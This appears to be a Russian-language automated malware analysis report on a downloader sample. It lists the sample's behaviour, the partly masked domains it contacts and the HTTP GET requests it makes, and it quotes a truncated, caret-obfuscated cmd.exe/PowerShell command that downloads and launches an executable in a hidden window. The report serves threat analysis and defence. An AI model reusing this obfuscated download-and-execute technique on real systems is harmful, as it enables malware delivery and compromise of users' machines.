Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V^:/C"^s^e^t U^Q^K=^ ^ ^ ^ ^ ^ ^}}^{hc^tac^}^;^ka^erb^;O^J^i$^ m^etI-ek^ovnI^;)O^J^i^$^ ^,^U^az^$(^eli^Fdaoln^wo^D^.lcT^$^{yrt^{)^ah^o^$ ni ^U^a^z^$(^hca^erof;'e^x^e.'+wM^d$^+^'\^'+...
Сетевая активность
Подключается к
- 'ta###s.co.uk':80
- 'qu#####asagrande.com':80
- 'qu#####asagrande.com':443
- 'vk###ekste.net':80
- 'vh###.timeweb.ru':443
- 'do##un.com':80
TCP
Запросы HTTP GET
- http://qu#####asagrande.com/EJSAsCD
- http://vk###ekste.net/f1OSAuOu5S
- http://do##un.com/x7tDH1jMd9
Другие
- 'qu#####asagrande.com':443
- 'vk###ekste.net':443
UDP
- DNS ASK ta###s.co.uk
- DNS ASK qu#####asagrande.com
- DNS ASK gl#####.sprintsoft.ro
- DNS ASK vk###ekste.net
- DNS ASK vh###.timeweb.ru
- DNS ASK do##un.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V^:/C"^s^e^t U^Q^K=^ ^ ^ ^ ^ ^ ^}}^{hc^tac^}^;^ka^erb^;O^J^i$^ m^etI-ek^ovnI^;)O^J^i^$^ ^,^U^az^$(^eli^Fdaoln^wo^D^.lcT^$^{yrt^{)^ah^o^$ ni ^U^a^z^$(^hca^erof;'e^x^e.'+wM^d$^+^'\^'+...' (со скрытым окном)
